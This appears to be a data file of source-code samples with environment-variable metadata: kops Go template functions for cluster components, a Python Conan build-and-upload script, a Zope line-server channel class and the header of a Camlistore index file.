sprigTxtFuncMap := sprig.TxtFuncMap()
dest["indent"] = sprigTxtFuncMap["indent"]
dest["contains"] = sprigTxtFuncMap["contains"]
dest["trimPrefix"] = sprigTxtFuncMap["trimPrefix"]
dest["semverCompare"] = sprigTxtFuncMap["semverCompare"]
dest["ClusterName"] = tf.ClusterName
dest["WithDefaultBool"] = func(v *bool, defaultValue bool) bool {
if v != nil {
return *v
}
return defaultValue
}
dest["GetInstanceGroup"] = tf.GetInstanceGroup
dest["GetNodeInstanceGroups"] = tf.GetNodeInstanceGroups
dest["HasHighlyAvailableControlPlane"] = tf.HasHighlyAvailableControlPlane
dest["ControlPlaneControllerReplicas"] = tf.ControlPlaneControllerReplicas
dest["CloudTags"] = tf.CloudTagsForInstanceGroup
dest["KubeDNS"] = func() *kops.KubeDNSConfig {
return cluster.Spec.KubeDNS
}
dest["NodeLocalDNSClusterIP"] = func() string {
if cluster.Spec.KubeProxy.ProxyMode == "ipvs" {
return cluster.Spec.KubeDNS.ServerIP
}
return "__PILLAR__CLUSTER__DNS__"
}
dest["NodeLocalDNSHealthCheck"] = func() string {
return fmt.Sprintf("%d", wellknownports.NodeLocalDNSHealthCheck)
}
dest["KopsControllerArgv"] = tf.KopsControllerArgv
dest["KopsControllerConfig"] = tf.KopsControllerConfig
dest["DnsControllerArgv"] = tf.DNSControllerArgv
dest["ExternalDnsArgv"] = tf.ExternalDNSArgv
dest["CloudControllerConfigArgv"] = tf.CloudControllerConfigArgv
// TODO: Only for GCE?
dest["EncodeGCELabel"] = gce.EncodeGCELabel
dest["Region"] = func() string {
return tf.Region
}
// will return openstack external ccm image location for current kubernetes version
dest["OpenStackCCMTag"] = tf.OpenStackCCMTag
dest["ProxyEnv"] = tf.ProxyEnv
dest["KopsSystemEnv"] = tf.KopsSystemEnv
dest["UseKopsControllerForNodeBootstrap"] = func() bool {
return tf.UseKopsControllerForNodeBootstrap()
}
dest["DO_TOKEN"] = func() string {
return os.Getenv("DIGITALOCEAN_ACCESS_TOKEN")
}
if featureflag.Spotinst.Enabled() {
if creds, err := spotinst.LoadCredentials(); err == nil {
dest["SpotinstToken"] = func() string { return creds.Token }
dest["SpotinstAccount"] = func() string { return creds.Account }
dest["SpotinstTokenBase64"] = func() string { return base64.StdEncoding.EncodeToString([]byte(creds.Token)) }
dest["SpotinstAccountBase64"] = func() string { return base64.StdEncoding.EncodeToString([]byte(creds.Account)) }
}
}
if cluster.Spec.Networking != nil && cluster.Spec.Networking.AmazonVPC != nil {
c := cluster.Spec.Networking.AmazonVPC
dest["AmazonVpcEnvVars"] = func() map[string]string {
envVars := map[string]string{
"AWS_VPC_K8S_CNI_CONFIGURE_RPFILTER": "false",
}
for _, e := range c.Env {
envVars[e.Name] = e.Value
}
return envVars
}
}
if cluster.Spec.Networking != nil && cluster.Spec.Networking.Calico != nil {
c := cluster.Spec.Networking.Calico
dest["CalicoIPv4PoolIPIPMode"] = func() string {
if c.EncapsulationMode != "ipip" {
return "Never"
}
if c.IPIPMode != "" {
return c.IPIPMode
}
if kops.CloudProviderID(cluster.Spec.CloudProvider) == kops.CloudProviderOpenstack {
return "Always"
}
return "CrossSubnet"
}
dest["CalicoIPv4PoolVXLANMode"] = func() string {
if c.EncapsulationMode != "vxlan" {
return "Never"
}
if c.VXLANMode != "" {
return c.VXLANMode
}
return "CrossSubnet"
}
}
if cluster.Spec.Networking != nil && cluster.Spec.Networking.Cilium != nil {
ciliumsecretString := ""
ciliumsecret, _ := secretStore.Secret("ciliumpassword")
if ciliumsecret != nil {
ciliumsecretString, err = ciliumsecret.AsString()
if err != nil {
return err
}
klog.V(4).Info("Cilium secret function successfully registered")
}
dest["CiliumSecret"] = func() string { return ciliumsecretString }
}
if cluster.Spec.Networking != nil && cluster.Spec.Networking.Flannel != nil {
flannelBackendType := cluster.Spec.Networking.Flannel.Backend
if flannelBackendType == "" {
klog.Warningf("Defaulting flannel backend to udp (not a recommended configuration)")
flannelBackendType = "udp"
}
dest["FlannelBackendType"] = func() string { return flannelBackendType }
}
if cluster.Spec.Networking != nil && cluster.Spec.Networking.Weave != nil {
weavesecretString := ""
weavesecret, _ := secretStore.Secret("weavepassword")
if weavesecret != nil {
weavesecretString, err = weavesecret.AsString()
if err != nil {
return err
}
klog.V(4).Info("Weave secret function successfully registered")
}
dest["WeaveSecret"] = func() string { return weavesecretString }
}
dest["CloudLabels"] = func() string {
labels := []string{
fmt.Sprintf("KubernetesCluster=%s", cluster.ObjectMeta.Name),
}
for n, v := range cluster.Spec.CloudLabels {
labels = append(labels, fmt.Sprintf("%s=%s", n, v))
}
// ensure stable sorting of tags
sort.Strings(labels)
return strings.Join(labels, ",")
}
dest["IsIPv6Only"] = tf.IsIPv6Only
dest["UseServiceAccountExternalPermissions"] = tf.UseServiceAccountExternalPermissions
if cluster.Spec.NodeTerminationHandler != nil {
dest["DefaultQueueName"] = func() string {
s := strings.Replace(tf.ClusterName(), ".", "-", -1)
domain := ".amazonaws.com/"
if strings.Contains(tf.Region, "cn-") {
domain = ".amazonaws.com.cn/"
}
url := "https://sqs." + tf.Region + domain + tf.AWSAccountID + "/" + s + "-nth"
return url
}
dest["EnableSQSTerminationDraining"] = func() bool { return *cluster.Spec.NodeTerminationHandler.EnableSQSTerminationDraining }
}
return nil
}
// ToJSON returns a json representation of the struct or on error an empty string
func (tf *TemplateFunctions) ToJSON(data interface{}) string {
encoded, err := json.Marshal(data)
if err != nil {
return ""
}
return string(encoded)
}
// EtcdScheme parses and grabs the protocol to the etcd cluster
func (tf *TemplateFunctions) EtcdScheme() string {
if tf.UseEtcdTLS() {
return "https"
}
return "http"
}
// SharedVPC is a simple helper function which makes the templates for a shared VPC clearer
func (tf *TemplateFunctions) SharedVPC() bool {
return tf.Cluster.SharedVPC()
}
// GetInstanceGroup returns the instance group with the specified name
func (tf *TemplateFunctions) GetInstanceGroup(name string) (*kops.InstanceGroup, error) {
ig := tf.KopsModelContext.FindInstanceGroup(name)
if ig == nil {
return nil, fmt.Errorf("InstanceGroup %q not found", name)
}
return ig, nil
}
// ControlPlaneControllerReplicas returns the number of replicas for controllers that should run in the cluster.
// If the cluster has a highly available control plane, this function returns 2; if it has a single control plane node, it returns 1.
func (tf *TemplateFunctions) ControlPlaneControllerReplicas() int {
if tf.HasHighlyAvailableControlPlane() {
return 2
}
return 1
}
// HasHighlyAvailableControlPlane returns true if the cluster has more than one control plane node, false otherwise.
func (tf *TemplateFunctions) HasHighlyAvailableControlPlane() bool {
cp := 0
for _, ig := range tf.InstanceGroups {
if ig.Spec.Role == kops.InstanceGroupRoleMaster {
cp++
if cp > 1 {
return true
}
}
}
return false
}
// CloudControllerConfigArgv returns the args to external cloud controller
func (tf *TemplateFunctions) CloudControllerConfigArgv() ([]string, error) {
cluster := tf.Cluster
if cluster.Spec.ExternalCloudControllerManager == nil {
return nil, fmt.Errorf("ExternalCloudControllerManager is nil")
}
var argv []string
if cluster.Spec.ExternalCloudControllerManager.Master != "" {
argv = append(argv, fmt.Sprintf("--master=%s", cluster.Spec.ExternalCloudControllerManager.Master))
}
if cluster.Spec.ExternalCloudControllerManager.LogLevel != 0 {
argv = append(argv, fmt.Sprintf("--v=%d", cluster.Spec.ExternalCloudControllerManager.LogLevel))
} else {
argv = append(argv, "--v=2")
}
if cluster.Spec.ExternalCloudControllerManager.CloudProvider != "" {
argv = append(argv, fmt.Sprintf("--cloud-provider=%s", cluster.Spec.ExternalCloudControllerManager.CloudProvider))
} else if cluster.Spec.CloudProvider != "" {
argv = append(argv, fmt.Sprintf("--cloud-provider=%s", cluster.Spec.CloudProvider))
} else {
return nil, fmt.Errorf("Cloud Provider is not set")
}
if cluster.Spec.ExternalCloudControllerManager.ClusterName != "" {
argv = append(argv, fmt.Sprintf("--cluster-name=%s", cluster.Spec.ExternalCloudControllerManager.ClusterName))
}
if cluster.Spec.ExternalCloudControllerManager.ClusterCIDR != "" {
argv = append(argv, fmt.Sprintf("--cluster-cidr=%s", cluster.Spec.ExternalCloudControllerManager.ClusterCIDR))
}
if cluster.Spec.ExternalCloudControllerManager.AllocateNodeCIDRs != nil {
argv = append(argv, fmt.Sprintf("--allocate-node-cidrs=%t", *cluster.Spec.ExternalCloudControllerManager.AllocateNodeCIDRs))
}
if cluster.Spec.ExternalCloudControllerManager.ConfigureCloudRoutes != nil {
argv = append(argv, fmt.Sprintf("--configure-cloud-routes=%t", *cluster.Spec.ExternalCloudControllerManager.ConfigureCloudRoutes))
}
if cluster.Spec.ExternalCloudControllerManager.CIDRAllocatorType != nil && *cluster.Spec.ExternalCloudControllerManager.CIDRAllocatorType != "" {
argv = append(argv, fmt.Sprintf("--cidr-allocator-type=%s", *cluster.Spec.ExternalCloudControllerManager.CIDRAllocatorType))
}
if cluster.Spec.ExternalCloudControllerManager.UseServiceAccountCredentials != nil {
argv = append(argv, fmt.Sprintf("--use-service-account-credentials=%t", *cluster.Spec.ExternalCloudControllerManager.UseServiceAccountCredentials))
} else {
argv = append(argv, fmt.Sprintf("--use-service-account-credentials=%t", true))
}
argv = append(argv, "--cloud-config=/etc/kubernetes/cloud.config")
return argv, nil
}
// DNSControllerArgv returns the args to the DNS controller
func (tf *TemplateFunctions) DNSControllerArgv() ([]string, error) {
cluster := tf.Cluster
var argv []string
argv = append(argv, "/dns-controller")
// @check if the dns controller has custom configuration
if cluster.Spec.ExternalDNS == nil {
argv = append(argv, []string{"--watch-ingress=false"}...)
klog.V(4).Infof("watch-ingress=false set on dns-controller")
} else {
// @check if the watch ingress is set
var watchIngress bool
if cluster.Spec.ExternalDNS.WatchIngress != nil {
watchIngress = fi.BoolValue(cluster.Spec.ExternalDNS.WatchIngress)
}
if watchIngress {
klog.Warningln("--watch-ingress=true set on dns-controller")
klog.Warningln("this may cause problems with previously defined services: https://github.com/kubernetes/kops/issues/2496")
}
argv = append(argv, fmt.Sprintf("--watch-ingress=%t", watchIngress))
if cluster.Spec.ExternalDNS.WatchNamespace != "" {
argv = append(argv, fmt.Sprintf("--watch-namespace=%s", cluster.Spec.ExternalDNS.WatchNamespace))
}
}
if dns.IsGossipHostname(cluster.Spec.MasterInternalName) {
argv = append(argv, "--dns=gossip")
// Configuration specifically for the DNS controller gossip
if cluster.Spec.DNSControllerGossipConfig != nil {
if cluster.Spec.DNSControllerGossipConfig.Protocol != nil {
argv = append(argv, "--gossip-protocol="+*cluster.Spec.DNSControllerGossipConfig.Protocol)
}
if cluster.Spec.DNSControllerGossipConfig.Listen != nil {
argv = append(argv, "--gossip-listen="+*cluster.Spec.DNSControllerGossipConfig.Listen)
}
if cluster.Spec.DNSControllerGossipConfig.Secret != nil {
argv = append(argv, "--gossip-secret="+*cluster.Spec.DNSControllerGossipConfig.Secret)
}
if cluster.Spec.DNSControllerGossipConfig.Seed != nil {
argv = append(argv, "--gossip-seed="+*cluster.Spec.DNSControllerGossipConfig.Seed)
} else {
argv = append(argv, fmt.Sprintf("--gossip-seed=127.0.0.1:%d", wellknownports.ProtokubeGossipWeaveMesh))
}
if cluster.Spec.DNSControllerGossipConfig.Secondary != nil {
if cluster.Spec.DNSControllerGossipConfig.Secondary.Protocol != nil {
argv = append(argv, "--gossip-protocol-secondary="+*cluster.Spec.DNSControllerGossipConfig.Secondary.Protocol)
}
if cluster.Spec.DNSControllerGossipConfig.Secondary.Listen != nil {
argv = append(argv, "--gossip-listen-secondary="+*cluster.Spec.DNSControllerGossipConfig.Secondary.Listen)
}
if cluster.Spec.DNSControllerGossipConfig.Secondary.Secret != nil {
argv = append(argv, "--gossip-secret-secondary="+*cluster.Spec.DNSControllerGossipConfig.Secondary.Secret)
}
if cluster.Spec.DNSControllerGossipConfig.Secondary.Seed != nil {
argv = append(argv, "--gossip-seed-secondary="+*cluster.Spec.DNSControllerGossipConfig.Secondary.Seed)
} else {
argv = append(argv, fmt.Sprintf("--gossip-seed-secondary=127.0.0.1:%d", wellknownports.ProtokubeGossipMemberlist))
}
}
} else {
// Default to primary mesh and secondary memberlist
argv = append(argv, fmt.Sprintf("--gossip-seed=127.0.0.1:%d", wellknownports.ProtokubeGossipWeaveMesh))
argv = append(argv, "--gossip-protocol-secondary=memberlist")
argv = append(argv, fmt.Sprintf("--gossip-listen-secondary=0.0.0.0:%d", wellknownports.DNSControllerGossipMemberlist))
argv = append(argv, fmt.Sprintf("--gossip-seed-secondary=127.0.0.1:%d", wellknownports.ProtokubeGossipMemberlist))
}
} else {
switch kops.CloudProviderID(cluster.Spec.CloudProvider) {
case kops.CloudProviderAWS:
if strings.HasPrefix(os.Getenv("AWS_REGION"), "cn-") {
argv = append(argv, "--dns=gossip")
} else {
argv = append(argv, "--dns=aws-route53")
}
case kops.CloudProviderGCE:
argv = append(argv, "--dns=google-clouddns")
case kops.CloudProviderDO:
argv = append(argv, "--dns=digitalocean")
default:
return nil, fmt.Errorf("unhandled cloudprovider %q", cluster.Spec.CloudProvider)
}
}
zone := cluster.Spec.DNSZone
if zone != "" {
if strings.Contains(zone, ".") {
// match by name
argv = append(argv, "--zone="+zone)
} else {
// match by id
argv = append(argv, "--zone=*/"+zone)
}
}
// permit wildcard updates
argv = append(argv, "--zone=*/*")
// Verbose, but not crazy logging
argv = append(argv, "-v=2")
return argv, nil
}
// KopsControllerConfig returns the yaml configuration for kops-controller
func (tf *TemplateFunctions) KopsControllerConfig() (string, error) {
cluster := tf.Cluster
config := &kopscontrollerconfig.Options{
Cloud: cluster.Spec.CloudProvider,
ConfigBase: cluster.Spec.ConfigBase,
}
if featureflag.CacheNodeidentityInfo.Enabled() {
config.CacheNodeidentityInfo = true
}
if tf.UseKopsControllerForNodeBootstrap() {
certNames := []string{"kubelet", "kubelet-server"}
signingCAs := []string{fi.CertificateIDCA}
if apiModel.UseCiliumEtcd(cluster) {
certNames = append(certNames, "etcd-client-cilium")
signingCAs = append(signingCAs, "etcd-clients-ca-cilium")
}
if cluster.Spec.KubeProxy.Enabled == nil || *cluster.Spec.KubeProxy.Enabled {
certNames = append(certNames, "kube-proxy")
}
if cluster.Spec.Networking.Kuberouter != nil {
certNames = append(certNames, "kube-router")
}
pkiDir := "/etc/kubernetes/kops-controller/pki"
config.Server = &kopscontrollerconfig.ServerOptions{
Listen: fmt.Sprintf(":%d", wellknownports.KopsControllerPort),
ServerCertificatePath: path.Join(pkiDir, "kops-controller.crt"),
ServerKeyPath: path.Join(pkiDir, "kops-controller.key"),
CABasePath: pkiDir,
SigningCAs: signingCAs,
CertNames: certNames,
}
switch kops.CloudProviderID(cluster.Spec.CloudProvider) {
case kops.CloudProviderAWS:
nodesRoles := sets.String{}
for _, ig := range tf.InstanceGroups {
if ig.Spec.Role == kops.InstanceGroupRoleNode || ig.Spec.Role == kops.InstanceGroupRoleAPIServer {
profile, err := tf.LinkToIAMInstanceProfile(ig)
if err != nil {
return "", fmt.Errorf("getting profile for ig %s: %v", ig.Name, err)
}
// The IAM Instance Profile has not been created at this point if it is not specified,
// because the IAM Instance Profile and the IAM Role are created in IAMModelBuilder tasks.
// Therefore, the IAM Role associated with the IAM Instance Profile is acquired only when it is not specified.
if ig.Spec.IAM != nil && ig.Spec.IAM.Profile != nil {
c := tf.cloud.(awsup.AWSCloud)
roles, err := awsup.GetRolesInInstanceProfile(c, *profile.Name)
if err != nil {
return "", fmt.Errorf("getting role from profile %s: %v", *profile.Name, err)
}
nodesRoles.Insert(roles...)
} else {
// When the IAM Instance Profile is not specified, it is created by kOps.
// In this case, the IAM Instance Profile name and the IAM Role name are the same,
// so it is fine to insert the IAM Instance Profile name as the role name in nodesRoles.
nodesRoles.Insert(*profile.Name)
}
}
}
config.Server.Provider.AWS = &awsup.AWSVerifierOptions{
NodesRoles: nodesRoles.List(),
Region: tf.Region,
}
default:
return "", fmt.Errorf("unsupported cloud provider %s", cluster.Spec.CloudProvider)
}
}
if tf.Cluster.Spec.PodCIDRFromCloud {
config.EnableCloudIPAM = true
}
// To avoid indentation problems, we marshal as json. json is a subset of yaml
b, err := json.Marshal(config)
if err != nil {
return "", fmt.Errorf("failed to serialize kops-controller config: %v", err)
}
return string(b), nil
}
// KopsControllerArgv returns the args to kops-controller
func (tf *TemplateFunctions) KopsControllerArgv() ([]string, error) {
var argv []string
argv = append(argv, "/kops-controller")
// Verbose, but not excessive logging
argv = append(argv, "--v=2")
argv = append(argv, "--conf=/etc/kubernetes/kops-controller/config/config.yaml")
return argv, nil
}
func (tf *TemplateFunctions) ExternalDNSArgv() ([]string, error) {
cluster := tf.Cluster
externalDNS := tf.Cluster.Spec.ExternalDNS
var argv []string
cloudProvider := cluster.Spec.CloudProvider
switch kops.CloudProviderID(cloudProvider) {
case kops.CloudProviderAWS:
argv = append(argv, "--provider=aws")
case kops.CloudProviderGCE:
project := cluster.Spec.Project
argv = append(argv, "--provider=google")
argv = append(argv, "--google-project="+project)
default:
return nil, fmt.Errorf("unhandled cloudprovider %q", cluster.Spec.CloudProvider)
}
argv = append(argv, "--events")
if fi.BoolValue(externalDNS.WatchIngress) {
argv = append(argv, "--source=ingress")
}
argv = append(argv, "--source=pod")
argv = append(argv, "--source=service")
argv = append(argv, "--compatibility=kops-dns-controller")
argv = append(argv, "--registry=txt")
argv = append(argv, "--txt-owner-id=kops-"+tf.ClusterName())
argv = append(argv, "--zone-id-filter="+tf.Cluster.Spec.DNSZone)
if externalDNS.WatchNamespace != "" {
argv = append(argv, "--namespace="+externalDNS.WatchNamespace)
}
return argv, nil
}
func (tf *TemplateFunctions) ProxyEnv() map[string]string {
cluster := tf.Cluster
envs := map[string]string{}
proxies := cluster.Spec.EgressProxy
if proxies == nil {
return envs
}
httpProxy := proxies.HTTPProxy
if httpProxy.Host != "" {
var portSuffix string
if httpProxy.Port != 0 {
portSuffix = ":" + strconv.Itoa(httpProxy.Port)
} else {
portSuffix = ""
}
url := "http://" + httpProxy.Host + portSuffix
envs["http_proxy"] = url
envs["https_proxy"] = url
}
if proxies.ProxyExcludes != "" {
envs["no_proxy"] = proxies.ProxyExcludes
envs["NO_PROXY"] = proxies.ProxyExcludes
}
return envs
}
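// Illustrative sketch (hypothetical values, not part of the original source):
// for an EgressProxy with HTTPProxy.Host "proxy.internal", Port 3128 and
// ProxyExcludes "10.0.0.0/8,localhost", ProxyEnv returns roughly
// {"http_proxy": "http://proxy.internal:3128", "https_proxy": "http://proxy.internal:3128",
// "no_proxy": "10.0.0.0/8,localhost", "NO_PROXY": "10.0.0.0/8,localhost"}.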
// KopsSystemEnv builds the env vars for a system component
func (tf *TemplateFunctions) KopsSystemEnv() []corev1.EnvVar {
envMap := env.BuildSystemComponentEnvVars(&tf.Cluster.Spec)
return envMap.ToEnvVars()
}
// OpenStackCCM returns OpenStack external cloud controller manager current image
// with tag specified to k8s version
func (tf *TemplateFunctions) OpenStackCCMTag() string {
var tag string
parsed, err := util.ParseKubernetesVersion(tf.Cluster.Spec.KubernetesVersion)
if err != nil {
tag = "latest"
} else {
if parsed.Minor == 13 {
// The bugfix release
tag = "1.13.1"
} else {
// otherwise we always use the .0 ccm image; if needed, that can be overridden using the cluster spec
tag = fmt.Sprintf("v%d.%d.0", parsed.Major, parsed.Minor)
}
}
return tag
}
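// Illustrative sketch (assumed versions): for KubernetesVersion "1.18.3" the
// function above yields "v1.18.0", for any 1.13.x it yields the bugfix tag
// "1.13.1", and if the version cannot be parsed it falls back to "latest".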
// GetNodeInstanceGroups returns a map containing the defined instance groups of role "Node".
func (tf *TemplateFunctions) GetNodeInstanceGroups() map[string]kops.InstanceGroupSpec {
nodegroups := make(map[string]kops.InstanceGroupSpec)
for _, ig := range tf.KopsModelContext.InstanceGroups {
if ig.Spec.Role == kops.InstanceGroupRoleNode {
nodegroups[ig.ObjectMeta.Name] = ig.Spec
}
}
return nodegroups
}
|
[
"\"DIGITALOCEAN_ACCESS_TOKEN\"",
"\"AWS_REGION\""
] |
[] |
[
"DIGITALOCEAN_ACCESS_TOKEN",
"AWS_REGION"
] |
[]
|
["DIGITALOCEAN_ACCESS_TOKEN", "AWS_REGION"]
|
go
| 2 | 0 | |
build_and_upload.py
|
import os
import ntpath
import pathlib
import json
import re
import platform
import subprocess
import tempfile
import time
import colorama
from colorama import Fore, Back, Style
def wintolin(path):
path = os.path.abspath(path)
if path[1:2] == ':':
drive = path[:1].lower()
return '/mnt/' + drive + path[2:].replace('\\', '/')
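# Illustrative sketch (assumed Windows path, not part of the original script):
# wintolin(r'C:\Users\dev\repo') yields '/mnt/c/Users/dev/repo', matching how
# WSL mounts Windows drives; paths without a drive letter currently fall
# through and return None.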
def delete_folder(pth) :
if not os.path.exists(pth):
return
for sub in pth.iterdir() :
if sub.is_dir() :
delete_folder(sub)
else :
sub.chmod(0o666)
sub.unlink()
pth.rmdir()
def run_command(source_command, target_system = None, check = False):
if not target_system:
target_system = platform.system()
isWsl = False
if target_system == 'Windows':
if platform.system() != 'Windows':
raise Exception("Building Windows packages on non-Windows system is not supported")
command = source_command
elif target_system == 'Linux':
if platform.system() == 'Linux':
command = source_command
elif platform.system() == 'Windows':
is32bit = platform.architecture()[0] == '32bit'
system32 = os.path.join(os.environ['SystemRoot'], 'SysNative' if is32bit else 'System32')
bash = os.path.join(system32, 'bash.exe')
command = '{} -c "{} > \'{}\'"'.format(bash, source_command, '{}')
isWsl = True
else:
raise Exception("Unknown host system: {}".format(platform.system()))
else:
raise Exception("Unknown target system: {}".format(config['os']))
if not isWsl:
print(Fore.YELLOW + "Executing: {}".format(command))
subprocess.check_output(command)
else:
with tempfile.NamedTemporaryFile(mode='r', encoding='utf-8') as f:
command = command.format(wintolin(f.name))
print("Executing: {}".format(command))
child = subprocess.Popen(command)
while 1:
where = f.tell()
line = f.readline()
if not line:
return_code = child.poll()
if return_code is not None:
if check and return_code != 0:
raise Exception("Command return {} exit status.".format(return_code))
return return_code
time.sleep(1)
f.seek(where)
else:
print(line.rstrip())
def get_change_default_gcc(version):
if run_command('command -v gcc-{0} && command -v g++-{0}'.format(version), target_system='Linux') == 0:
return 'export CC="$(which gcc-{0})" && export CXX="$(which g++-{0})" && '.format(version)
return ''
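# Illustrative sketch (assumed compiler version): get_change_default_gcc('9')
# returns 'export CC="$(which gcc-9)" && export CXX="$(which g++-9)" && ' when
# gcc-9/g++-9 are installed, and '' otherwise, so the result can simply be
# prepended to the conan command built in create_package below.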
def load_configs(obj):
configs = []
for configObj in obj:
if not configObj['id'] or not configObj['args']:
raise Exception("No id or config field was found")
if configObj['args']['os']:
target_os = configObj['args']['os']
else:
target_os = platform.system()
configs.append({ 'id': configObj['id'], 'os': target_os, 'args': configObj['args'] })
return configs
def install_repo(package):
match = re.search(r'://.+?/.+?/(.+)', package['url'])
repo_path = os.path.join(os.getcwd(), match.group(1))
delete_folder(pathlib.Path(repo_path))
run_command('git clone --recurse-submodules {}'.format(package['url']))
return repo_path
def get_package_conan_info(package_path):
with open(os.path.join(package_path, 'conanfile.py')) as f:
file_data = f.read()
result = {}
match = re.search(r'name\s*=\s*"([a-zA-Z0-9-.]+)"', file_data)
result['name'] = match.group(1)
match = re.search(r'version\s*=\s*"([a-zA-Z0-9-.]+)"', file_data)
result['version'] = match.group(1)
return result
def get_package_build_data(repo_path, package, primary_name, build_configs):
build_data = get_package_conan_info(repo_path)
build_data['thread'] = package['thread']
secondary_name = package['secondary'] if 'secondary' in package else None
build_data['primary'] = primary_name
build_data['secondary'] = secondary_name
build_data['owner'] = secondary_name if secondary_name else primary_name
build_data['configs'] = [c for c in build_configs if c['id'] in package['configs']]\
if 'configs' in package else build_configs
return build_data
def create_package(build_data):
name = build_data['name']
owner = build_data['owner']
thread = build_data['thread']
for config in build_data['configs']:
params = ['-s {}=\"{}\"'.format(s, v) for (s, v) in config['args'].items()]
conan_command = ' '.join(
['conan', 'create', '.', '{}/{}'.format(owner, thread), *params, '--build=' + name, '--build=missing'])
if 'compiler.version' in config['args'] and config['os'] == 'Linux':
conan_command = get_change_default_gcc(config['args']['compiler.version']) + conan_command
run_command(conan_command, config['os'])
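# Illustrative sketch (hypothetical package, remote and config): with name 'zlib',
# owner 'myremote', thread 'stable' and args {'os': 'Linux', 'build_type': 'Release'},
# the assembled command is roughly:
#   conan create . myremote/stable -s os="Linux" -s build_type="Release" --build=zlib --build=missing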
def upload_package(build_data):
command = 'conan upload {}/{}@{}/{} -r {} --all'\
.format(build_data['name'], build_data['version'], build_data['owner'], build_data['thread'], '{}' )
for build_os in ['Windows', 'Linux']:
if build_data['secondary']:
run_command(command.format(build_data['secondary']), build_os)
run_command(command.format(build_data['primary']), build_os)
if __name__ == '__main__':
colorama.init(autoreset=True)
with open('packages.json') as f:
config = json.load(f)
primary_name = config["primary"]
build_configs = load_configs(config['configs'])
if not primary_name:
raise Exception("Primary remote is required")
for package in config['packages']:
print(Fore.CYAN + "-------------------------Building package {}...".format(package['url']))
repo_path = install_repo(package)
build_data = get_package_build_data(repo_path, package, primary_name, build_configs)
print(Fore.CYAN + "Package info: {}".format(build_data))
old_dir = os.getcwd()
try:
os.chdir(repo_path)
create_package(build_data)
finally:
os.chdir(old_dir)
upload_package(build_data)
print(Fore.GREEN + "-------------------------Built package {}.".format(build_data['name']))
|
[] |
[] |
[
"SystemRoot"
] |
[]
|
["SystemRoot"]
|
python
| 1 | 0 | |
src/zope/server/linereceiver/lineserverchannel.py
|
##############################################################################
#
# Copyright (c) 2001, 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Line receiver channel
This channel evaluates requests line by line. This is particularly useful for
protocols that use a line-based command structure.
"""
from asyncore import compact_traceback
import os
import sys
from zope.server.serverchannelbase import ServerChannelBase
from zope.server.linereceiver.linecommandparser import LineCommandParser
from zope.server.linereceiver.linetask import LineTask
DEBUG = os.environ.get('ZOPE_SERVER_DEBUG')
class LineServerChannel(ServerChannelBase):
"""The Line Server Channel represents a connection to a particular
client. We can therefore store information here."""
# Wrapper class that is used to execute a command in a different thread
task_class = LineTask
# Class that is being initialized to parse the input
parser_class = LineCommandParser
# List of commands that are always available
special_commands = ('cmd_quit',)
# Commands that are run in a separate thread
thread_commands = ()
# Define the authentication status of the channel. Note that only the
# "special commands" can be executed without having authenticated.
authenticated = 0
# Define the reply code for non-authenticated responses
not_auth_reply = 'LOGIN_REQUIRED'
# Define the reply code for an unrecognized command
unknown_reply = 'CMD_UNKNOWN'
# Define the error message that occurs, when the reply code was not found.
reply_error = '500 Unknown Reply Code: %s.'
# Define the status messages
status_messages = {
'CMD_UNKNOWN': "500 '%s': command not understood.",
'INTERNAL_ERROR': "500 Internal error: %s",
'LOGIN_REQUIRED': '530 Please log in with USER and PASS',
}
def handle_request(self, command):
"""Process a command.
Some commands use an alternate thread.
"""
assert isinstance(command, LineCommandParser)
cmd = command.cmd
method = 'cmd_' + cmd.lower()
if not self.authenticated and method not in self.special_commands:
# The user is not logged in, therefore don't allow anything
self.reply(self.not_auth_reply)
elif method in self.thread_commands:
# Process in another thread.
task = self.task_class(self, command, method)
self.queue_task(task)
elif hasattr(self, method):
try:
getattr(self, method)(command.args)
except: # noqa: E722 do not use bare 'except'
self.exception()
else:
self.reply(self.unknown_reply, cmd.upper())
def reply(self, code, args=(), flush=1):
""" """
try:
msg = self.status_messages[code] % args
except: # noqa: E722 do not use bare 'except'
msg = self.reply_error % code
self.write(msg.encode('utf-8') + b'\r\n')
if flush:
self.flush(0)
# TODO: Some logging should go on here.
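# Illustrative sketch (assumed command name): reply('CMD_UNKNOWN', 'FOO') writes
# b"500 'FOO': command not understood.\r\n" to the channel and flushes it, while
# an unrecognized reply code falls back to the reply_error template above.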
def handle_error_no_close(self):
"""See asyncore.dispatcher.handle_error()"""
_nil, t, v, tbinfo = compact_traceback()
# sometimes a user repr method will crash.
try:
self_repr = repr(self)
except: # noqa: E722 do not use bare 'except'
self_repr = '<__repr__(self) failed for object at %0x>' % id(self)
self.log_info(
'uncaptured python exception, closing channel %s (%s:%s %s)' % (
self_repr,
t,
v,
tbinfo
),
'error'
)
def exception(self):
if DEBUG: # pragma: no cover
import traceback
traceback.print_exc()
t, v = sys.exc_info()[:2]
try:
info = '%s: %s' % (getattr(t, '__name__', t), v)
except: # noqa: E722 do not use bare 'except'
info = str(t)
self.reply('INTERNAL_ERROR', info)
self.handle_error_no_close()
self.close_when_done()
|
[] |
[] |
[
"ZOPE_SERVER_DEBUG"
] |
[]
|
["ZOPE_SERVER_DEBUG"]
|
python
| 1 | 0 | |
pkg/index/index.go
|
/*
Copyright 2011 Google Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package index
import (
"bytes"
"errors"
"fmt"
"io"
"log"
"os"
"sort"
"strconv"
"strings"
"sync"
"time"
"camlistore.org/pkg/blob"
"camlistore.org/pkg/blobserver"
"camlistore.org/pkg/context"
"camlistore.org/pkg/env"
"camlistore.org/pkg/jsonconfig"
"camlistore.org/pkg/schema"
"camlistore.org/pkg/sorted"
"camlistore.org/pkg/strutil"
"camlistore.org/pkg/types"
"camlistore.org/pkg/types/camtypes"
)
func init() {
blobserver.RegisterStorageConstructor("index", newFromConfig)
}
